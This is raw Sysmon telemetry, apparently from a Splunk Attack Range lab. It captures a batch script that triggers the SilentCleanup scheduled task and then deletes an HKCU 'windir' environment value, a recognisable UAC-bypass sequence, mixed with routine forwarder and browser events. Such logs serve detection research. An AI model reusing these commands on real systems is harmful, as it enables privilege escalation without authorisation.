07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.137{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x8000000000000000808417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:59.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B8E8AD38D588A14ED6914F243C449C6,SHA256=23DB2C08DD828544E4B499680064A2E4602184E913D4A2CE4DCC974B88009A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C00B0A0A5F648A83FC7DABBE983256F9,SHA256=C7CA15308C8B34075C3A561F0429309B47C30AC271170AAACE47819BACEDA919,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51093-false10.0.1.12-8000- 354300x80000000000000001050801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.616{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51092-false10.0.1.12-8089- 23542300x80000000000000001050800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79123B595923332BE8EC1CC793538076,SHA256=1B440AB23887F237F06EA910D8678D3EFE72BF3FF88B4B4F65E2973FCE994B1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.114{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE52332C0955F75D25FBBBCC5DBAFD,SHA256=3551A2B31F83D0C12D487B79CE21986D396D56F6F488A3ED0C05BC3BC867EB33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.798{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57326-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:00.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2DF5D59F92FAE29149F65A5DCCB55F,SHA256=B42942E62C8D73FF778C227AC6A3CE6872311CA689F96F833721BB1CF8B35385,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001050808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001050807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001050806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001050805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.772{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6da511.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.231{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1D2A62BD4668997789D393B34CDF4D,SHA256=2D00B1BFD515668A4170E50D57EE008D6F4E949BD88861824D477023C1099CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:01.684{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3E0B6E01C864553D98A084461C352C,SHA256=ADDCFED888A2DDD37106EA7A31676E0CA6E4D848A7701FBB8C943F96BD2C0459,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.828{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-13755-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001050821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.620{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.619{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8458AC72C5CE20F3BADF7D18AD9945,SHA256=47B2FC756D48C512D11F0AB66AF236BD03AC27E62DC2BF06DEDA7499216AFA84,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001050818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:57:01.239{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windir 10341000x80000000000000001050817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.202{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.176{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg delete "HKCU\Environment" /v "windir" /FC:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x8000000000000000808420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:02.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5541FE6A677AE55D19B00782A4B0CC4D,SHA256=BAC85624122442268E57CAB3A229135F4E59258A4CC192FB98BF63FDB8904D7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.711{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 